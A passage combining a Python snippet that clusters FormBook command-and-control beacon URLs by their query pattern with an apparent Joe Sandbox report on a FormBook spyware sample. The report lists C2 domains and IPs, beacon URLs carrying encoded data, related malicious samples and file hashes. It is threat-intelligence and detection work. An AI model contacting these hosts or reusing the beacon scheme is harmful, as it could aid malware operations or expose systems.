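# Directory shape seen on every host in this report: '/<4 lowercase alnum>/'.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
# One short alphanumeric token (UzoT8ph on all five hosts here) ...
SHORT_RE = re.compile(r"^[A-Za-z0-9]{4,10}$")
# ... and one long base64-looking blob. '+' and '/' are part of that alphabet,
# so the query is split by hand: parse_qs would turn '+' into a space.
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")

# (short param name, short value, blob param name): the part that stays constant
# across hosts while the blob changes. The name is this example's own.
CampaignKey = Tuple[str, str, str]


def shape(url: str) -> Optional[Tuple[str, str, Optional[CampaignKey]]]:
    """Return (host, path, campaign_key) when url matches the template, else None.

    campaign_key is None for the bare check-in path (no query string)."""
    parts = urlsplit(url)
    if parts.hostname is None or not PATH_RE.match(parts.path):
        return None
    if not parts.query:
        return (parts.hostname, parts.path, None)
    params: List[Tuple[str, str]] = []
    for piece in parts.query.split("&"):
        name, _, value = piece.partition("=")  # first '=' only: keeps '==' padding
        params.append((name, value))
    if len(params) != 2:
        return None
    short = [(n, v) for n, v in params if SHORT_RE.match(v)]
    blob = [(n, v) for n, v in params if BLOB_RE.match(v)]
    if len(short) != 1 or len(blob) != 1:
        return None
    (short_name, short_value), (blob_name, _) = short[0], blob[0]
    return (parts.hostname, parts.path, (short_name, short_value, blob_name))


def cluster(urls: List[str]) -> Dict[CampaignKey, List[Tuple[str, str]]]:
    """Group (host, path) pairs by campaign_key; hosts sharing a key share a config."""
    groups: Dict[CampaignKey, set] = {}
    for url in urls:
        result = shape(url)
        if result and result[2]:
            groups.setdefault(result[2], set()).add((result[0], result[1]))
    return {key: sorted(hosts) for key, hosts in groups.items()}


# Constructed input: beacon URLs from this report plus two benign search-provider
# URLs that were in the same memory dump.
URLS = [
    "http://www.tophm.xyz/30rz/",
    "http://www.tophm.xyz/30rz/?wZBh=UzoT8ph&8T2hn=wd7m4mq4h41P+rN28pyT+ttY7GHVuAvuqtpnERraqOjaWWvMpBvRQDu/0Ra1ptpTEf0KGGfWsjsqje2uOEmu4OBI5eYxRB5JEme+Ix16OOjxqM3SMw==",
    "http://www.kovallo.cloud/koup/?wZBh=UzoT8ph&8T2hn=zjgQ1IglZSD3j4X7Mb/L9VMKC/lioNLyTiYpIFDypb2XxqZYhzfHyCasu3J1FKt+ikpO665Ej+Wn9KB3IEhbZRsyBSNLju/tAMuqMeNka3iE/L9xhA==",
    "http://www.newdaydawning.net/igaf/?wZBh=UzoT8ph&8T2hn=z7pb/AVrgdjheaZEOJkK38wzdFwtWkfwIJb37ItQC6dYo/jeths6OaqB6aU1oO66EyRWu95qtLC+XaCQo95JR9SCocHD8In7sYhzsBDy4zub0g2aDA==",
    "http://www.030002304.xyz/6uay/?8T2hn=4t2O3O+pZmQg6Me57d3wJo6heDIGdjpowWW3Ki6AModP/Z3yDnI8KOs9thhsa1jg844M9/RLYM/vwhOiRdypu3qnYIwYUCnWcXg0sNwBl87ACBA0Bg==&wZBh=UzoT8ph",
    "http://www.coffee-and-blends.info/fhdl/?8T2hn=LZaialQPeltHsffZ/7p0gpt1IPXssyuTEG6qh16Ey8GBHHnvE/VN849lTokelyHAfcJ0dO++uyhAerPT/GlJwSRZaBuTZ4zvU4RSMcEjcessmo3sdA==&wZBh=UzoT8ph",
    "https://duckduckgo.com/ac/?q=",
    "https://www.ecosia.org/newtab/",
]

if __name__ == "__main__":
    for key, hosts in cluster(URLS).items():
        print(key)
        for host, path in hosts:
            print(f"  {host}{path}")
```

A bare four-character path with no query is only a candidate, since plenty of legitimate sites have such paths; treat it as an indicator when the same host also produces the two-parameter form, or when it resolves to an IP already in the tables above. Parameter order is deliberately ignored because the report shows both orders (wZBh first on tophm.xyz, 8T2hn first on 030002304.xyz) from the same sample.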
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
217.160.0.231 | www.coffee-and-blends.info | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
65.21.196.90 | 030002304.xyz | United States | 199592 | CP-ASDE | true
199.192.21.169 | www.tophm.xyz | United States | 22612 | NAMECHEAP-NETUS | true
44.213.25.70 | newdaydawning.net | United States | 14618 | AMAZON-AESUS | false
81.2.196.19 | kovallo.cloud | Czech Republic | 24806 | INTERNET-CZKtis238403KtisCZ | false
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1529867
                                                    Start date and time:2024-10-09 14:00:07 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 8m 59s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:NU1aAbSmCr.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:ee229e0094d512a8a9e8210e75ca4319384360113b541aa7a10ed301e0425830.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@11/7@5/5
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 97%
                                                    • Number of executed functions: 105
                                                    • Number of non-executed functions: 306
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target mCFHCvdrqdDiDT.exe, PID 6888 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: NU1aAbSmCr.exe
Time | Type | Description
08:00:58 | API Interceptor | 1x Sleep call for process: NU1aAbSmCr.exe modified
08:01:00 | API Interceptor | 16x Sleep call for process: powershell.exe modified
08:02:22 | API Interceptor | 715685x Sleep call for process: NETSTAT.EXE modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    217.160.0.231PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                    • www.coffee-and-blends.info/bhth/
                                                    New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                    • www.coffee-and-blends.info/bhth/
                                                    65.21.196.908EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                    • www.030002304.xyz/f06i/
                                                    BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                    • www.030002837.xyz/y045/
                                                    BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                    • www.070001294.xyz/90jl/
                                                    5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                    • www.030002721.xyz/st0f/?-hF=sZ0LOH4&HPBxr6=OZJ3FWHE8eHsfWE6sR/jZh7GV9NsFGiNmpPQ4eftWQT1hyascoenGoAxdn6KH9WZ2QPSeMYxIK2pDBtCkY1R4v4J1R7l9kCKhVgR/LucEqSnpRqwhg==
                                                    RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                    • www.030003302.xyz/1nuz/?LT=aZbPzzPX3H&O47=39evZXa6m7baCAiDcr0ch6V4fD09WsXkaMbScS7vY88jTdTJUv9E9AetrBPXqBlycVnLEijqhZPiEuH/pw4OidZAp+cuSwNE5fzYgJgK5BTkLsTa3g==
                                                    Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                    • www.030002304.xyz/u38h/?EZ2lo=iaxEuHPh9M0PkCehiVmYq99vb8GYcF42nF8/pgvOtFqWiDn4lMrJ/WO5nlbDSyDBFBFfwqZzhOOdUgIoiT3LOtzwEygyB6NUSlIKo/1Br+QrM4rsiQ==&7NP=7FXXUPl
                                                    rpedido-002297.exe | Get hash | malicious | FormBook, GuLoader | Browse
                                                    • www.030002626.xyz/49rz/
                                                    Arrival Notice_pdf.exe | Get hash | malicious | FormBook | Browse
                                                    • www.030002803.xyz/l4gu/
                                                    P030092024LANDWAY.exe | Get hash | malicious | FormBook | Browse
                                                    • www.030002837.xyz/zl45/
                                                    LgzpILNkS2.exe | Get hash | malicious | FormBook | Browse
                                                    • www.030002304.xyz/7b6l/
                                                    199.192.21.169 | lPX6PixV4t.exe | Get hash | malicious | FormBook | Browse
                                                    • www.zenscape.top/d8cw/
                                                    | Z6s208B9QX.exe | Get hash | malicious | FormBook | Browse
                                                    • www.zenscape.top/d8cw/
                                                    | 8mmZ7Bkoj1.exe | Get hash | malicious | FormBook | Browse
                                                    • www.cenfresh.life/6iok/
                                                    | PURCHASE ORDER.exe | Get hash | malicious | FormBook | Browse
                                                    • www.selftip.top/85su/
                                                    | update SOA.exe | Get hash | malicious | FormBook | Browse
                                                    • www.technectar.top/ghvt/
                                                    | NVOICE FOR THE MONTH OF AUG-24.exe | Get hash | malicious | FormBook | Browse
                                                    • www.selftip.top/85su/
                                                    | RFQ - HTS45785-24-0907I000.exe | Get hash | malicious | FormBook | Browse
                                                    • www.zenscape.top/d8cw/
                                                    | Request for Quotation Hi-Tech Park Project 193200.exe | Get hash | malicious | FormBook | Browse
                                                    • www.zenscape.top/d8cw/
                                                    | DEBIT NOTE 01ST SEP 2024.exe | Get hash | malicious | FormBook | Browse
                                                    • www.selftip.top/85su/
                                                    | DCP11-83642024..exe | Get hash | malicious | FormBook | Browse
                                                    • www.urbanpulse.help/r50h/
                                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                    s-part-0032.t-0009.t-msedge.net | Doc_0211.zip | Get hash | malicious | Unknown | Browse
                                                    • 13.107.246.60
                                                    | http://www.gofreight.com/ | Get hash | malicious | Unknown | Browse
                                                    • 13.107.246.60
                                                    | T1TmLXusl0.exe | Get hash | malicious | SmokeLoader | Browse
                                                    • 13.107.246.60
                                                    | https://securcomau.gurucan.com/66e8e67dd77b5900129b4800 | Get hash | malicious | HTMLPhisher | Browse
                                                    • 13.107.246.60
                                                    | https://urbanentertainmentfo.com.de/7AHXX/ | Get hash | malicious | HTMLPhisher | Browse
                                                    • 13.107.246.60
                                                    | file.exe | Get hash | malicious | Unknown | Browse
                                                    • 13.107.246.60
                                                    | https://link-karix.unifiedrml.com/link/load/?uid=66f149a6a2cee777918b45c2-66f14b565f7b47ad77e978c0-66f14b0aa2cee705a28b4575&uri=https%3A%2F%2Fbluworldusabluworldusa.jimdofree.com/ | Get hash | malicious | HTMLPhisher | Browse
                                                    • 13.107.246.60
                                                    | https://paa9eki.fitutend.com/p0wh/ | Get hash | malicious | HTMLPhisher | Browse
                                                    • 13.107.246.60
                                                    | file.exe | Get hash | malicious | Stealc, Vidar | Browse
                                                    • 13.107.246.60
                                                    | https://keepass.info/news/n240601_2.57.html#v1 | Get hash | malicious | Unknown | Browse
                                                    • 13.107.246.60
                                                    www.coffee-and-blends.info | PO For Bulk Order.exe | Get hash | malicious | FormBook | Browse
                                                    • 217.160.0.231
                                                    | New Purchase Order.exe | Get hash | malicious | FormBook | Browse
                                                    • 217.160.0.231
                                                    | x.exe | Get hash | malicious | FormBook | Browse
                                                    • 217.160.0.231
                                                    | bin.exe | Get hash | malicious | FormBook | Browse
                                                    • 217.160.0.231
                                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                    ONEANDONE-ASBrauerstrasse48DE | pQGOxS84rW.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse
                                                    • 213.165.67.119
                                                    | http://gastrotrade24.org/ | Get hash | malicious | Unknown | Browse
                                                    • 217.160.0.174
                                                    | BAJFMONYm2.exe | Get hash | malicious | FormBook | Browse
                                                    • 74.208.236.183
                                                    | N2Qncau2rN.exe | Get hash | malicious | FormBook | Browse
                                                    • 74.208.236.25
                                                    | http://lifecodigestion.com | Get hash | malicious | Unknown | Browse
                                                    • 217.76.142.239
                                                    | SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe | Get hash | malicious | Unknown | Browse
                                                    • 195.20.232.175
                                                    | SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe | Get hash | malicious | Unknown | Browse
                                                    • 195.20.232.175
                                                    | na.elf | Get hash | malicious | Unknown | Browse
                                                    • 195.20.246.158
                                                    | na.elf | Get hash | malicious | Mirai | Browse
                                                    • 212.227.156.190
                                                    | Contrato de Cesin de Crditos Sin Recurso.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
                                                    • 213.165.67.118
                                                    CP-ASDE | 9vhyFG1hNa.exe | Get hash | malicious | FormBook | Browse
                                                    • 65.21.196.90
                                                    | 8EhMjL3yNF.exe | Get hash | malicious | FormBook | Browse
                                                    • 65.21.196.90
                                                    | BILL OF LADDING.exe | Get hash | malicious | FormBook | Browse
                                                    • 65.21.196.90
                                                    | https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFnDa0TAMLVO9WtBTyYEZqZA-3DPrnv_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOmYNN4Eos0I-2F5FhDJBI4w4qadztSYeu4ugOMJrD5ZJ3NK5HbR-2B5js4EjZpFmlZJIJ2eepX0b1t3SsV5gyIJGc7CJjeC8X5Wxzv49-2FqOYJzl5qBXpr-2BWwAW7G6cWDOqZN4YK73LjV4xBBNvL9fcHX0SM3SHQjbhXBuKD0dh5WqiuRgt8l7OsZEvxy8UkJaur7KIBjJyVTij7zCSJnYd6mjsUFQl8fAjX9eSOEGKjy2XWh8GHa2xi9VgTVCxGMcn7gM-3D | Get hash | malicious | Unknown | Browse
                                                    • 65.21.29.43
                                                    | BAJFMONYm2.exe | Get hash | malicious | FormBook | Browse
                                                    • 65.21.196.90
                                                    | 5FRWRDOqk7.exe | Get hash | malicious | FormBook | Browse
                                                    • 65.21.196.90
                                                    | RQ#071024.exe | Get hash | malicious | FormBook | Browse
                                                    • 65.21.196.90
                                                    | http://dmed-industries.com | Get hash | malicious | HtmlDropper | Browse
                                                    • 65.21.29.43
                                                    | Arrival notice.exe | Get hash | malicious | FormBook | Browse
                                                    • 65.21.196.90
                                                    | https://jumatan.sudaha.biz.id/4F741t%23XjCw%5BYg/ | Get hash | malicious | Unknown | Browse
                                                    • 65.21.235.194
                                                    AMAZON-AESUS | https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzIzOTU1LCJuYmYiOjE3MjgzMjM5NTUsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiIxMzhudno3eXlrZ2h1NDA5OGZrYiIsInRva2VuIjoiMTM4bnZ6N3l5a2dodTQwOThma2IiLCJzZW5kX2F0IjoxNzI4MzIyODA2LCJlbWFpbF9pZCI6OTk2NDk2NywiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTQ0ODIsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj1XZSUyN3JlK3Rha2luZytvdmVyK3RoaXMrTmF0aW9uYWwrRGF5In0.z00HBrh18YFkCiPz9m_Gcq8DkC4g7ZLK6Qs5LoMEHUo | Get hash | malicious | HTMLPhisher | Browse
                                                    • 3.217.201.113
                                                    | na.elf | Get hash | malicious | Unknown | Browse
                                                    • 54.54.164.187
                                                    | na.elf | Get hash | malicious | Mirai | Browse
                                                    • 54.136.161.102
                                                    | na.elf | Get hash | malicious | Mirai | Browse
                                                    • 34.202.179.186
                                                    | na.elf | Get hash | malicious | Mirai | Browse
                                                    • 34.202.220.133
                                                    | http://www.gofreight.com/ | Get hash | malicious | Unknown | Browse
                                                    • 3.212.99.33
                                                    | attachment (15).eml | Get hash | malicious | Unknown | Browse
                                                    • 52.206.205.81
                                                    | http://fortcollinsfineart.com/ | Get hash | malicious | Unknown | Browse
                                                    • 52.7.22.181
                                                    | original.eml | Get hash | malicious | HtmlDropper | Browse
                                                    • 52.5.13.197
                                                    | https://www-washingtoncountyinsider-com.webpkgcache.com/doc/-/s/www.washingtoncountyinsider.com// | Get hash | malicious | Unknown | Browse
                                                    • 3.5.1.211
                                                    INTERNET-CZKtis238403KtisCZ | lPX6PixV4t.exe | Get hash | malicious | FormBook | Browse
                                                    • 81.2.196.19
                                                    | Z6s208B9QX.exe | Get hash | malicious | FormBook | Browse
                                                    • 81.2.196.19
                                                    | POPO00003964.exe | Get hash | malicious | FormBook | Browse
                                                    • 81.2.196.19
                                                    | YSjOEAta07.exe | Get hash | malicious | FormBook | Browse
                                                    • 81.2.196.19
                                                    | RFQ - HTS45785-24-0907I000.exe | Get hash | malicious | FormBook | Browse
                                                    • 81.2.196.19
                                                    | Purchase Order_ AEPL-2324-1126.exe | Get hash | malicious | FormBook | Browse
                                                    • 81.2.196.19
                                                    | Request for Quotation Hi-Tech Park Project 193200.exe | Get hash | malicious | FormBook | Browse
                                                    • 81.2.196.19
                                                    | PO2024033194.exe | Get hash | malicious | FormBook | Browse
                                                    • 81.2.196.19
                                                    | SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exe | Get hash | malicious | FormBook | Browse
                                                    • 81.2.196.19
                                                    | New Purchase Order.exe | Get hash | malicious | FormBook | Browse
                                                    • 81.2.196.19
                                                    NAMECHEAP-NETUS | 9vhyFG1hNa.exe | Get hash | malicious | FormBook | Browse
                                                    • 162.0.238.43
                                                    | 8EhMjL3yNF.exe | Get hash | malicious | FormBook | Browse
                                                    • 162.0.238.43
                                                    | lPX6PixV4t.exe | Get hash | malicious | FormBook | Browse
                                                    • 199.192.21.169
                                                    | LegionLoader (13).msi | Get hash | malicious | Unknown | Browse
                                                    • 162.255.119.168
                                                    | LegionLoader (14).msi | Get hash | malicious | Unknown | Browse
                                                    • 162.255.119.168
                                                    | LegionLoader (15).msi | Get hash | malicious | Unknown | Browse
                                                    • 162.255.119.168
                                                    | LegionLoader (10).msi | Get hash | malicious | Unknown | Browse
                                                    • 162.255.119.168
                                                    | LegionLoader (11).msi | Get hash | malicious | Unknown | Browse
                                                    • 162.255.119.168
                                                    | LegionLoader (12).msi | Get hash | malicious | Unknown | Browse
                                                    • 162.255.119.168
                                                    | LegionLoader (9).msi | Get hash | malicious | Unknown | Browse
                                                    • 162.255.119.168
                                                    No context
                                                    No context
                                                    Process:C:\Users\user\Desktop\NU1aAbSmCr.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):2232
                                                    Entropy (8bit):5.380285623575084
                                                    Encrypted:false
                                                    SSDEEP:48:+WSU4xympjgs4Rc9tEoUl8NPZHUl7u1iMugeC/ZM0Uyus:+LHxvCsIcnSKRHmOugw1s
                                                    MD5:2934CA20BBFAEA7EF443B53BCDE1CF1B
                                                    SHA1:EDC8343ECF9C01C447AB954CB93C19A83A8DBB8E
                                                    SHA-256:791F1B8BF492FC44797F1ECE7BA3B4767EE63FB502B39C3D328FA70DC88D54C8
                                                    SHA-512:22C39B94B5F046696CC84CF5F468F1ABF44A896A9B12B1A60046EEA9F9E92D30810A5FECDB989FB1803D859F0253F8A3578E58310A6E408686B3B86723DE9820
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                    Process:C:\Windows\SysWOW64\NETSTAT.EXE
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1221538113908904
                                                    Encrypted:false
                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                    MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                    SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                    SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                    SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.872759766194143
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:NU1aAbSmCr.exe
                                                    File size:694'784 bytes
                                                    MD5:519b9a9e52aa6e23736f01afa4001654
                                                    SHA1:dd28761acf65483cf2de998e93b9490afb27f196
                                                    SHA256:ee229e0094d512a8a9e8210e75ca4319384360113b541aa7a10ed301e0425830
                                                    SHA512:ab5444d71d20f010f1ff695baefcb43bbfe902f112a2cf077178a2772535854f8de56fa81c77bfb22af5972b377b2c89553ceb51702f15da411b4b9060f4f318
                                                    SSDEEP:12288:WHoc9jfIvg+0pYFFt8tLhCCIzOCXOqhGO1mPkNEKXD5p7iYYLM6ipxCbyUjU1zdL:Qzf/pYFwVXQOMOqhGPkN5T5pBYZwAWGU
                                                    TLSH:0BE412481A9AD517D4E70BF80A20C2B057F95EDD6A27E3035FEE7DEB7C26B502840792
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................................@................................
                                                    Icon Hash:00928e8e8686b000
                                                    Entrypoint:0x4aafc2
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
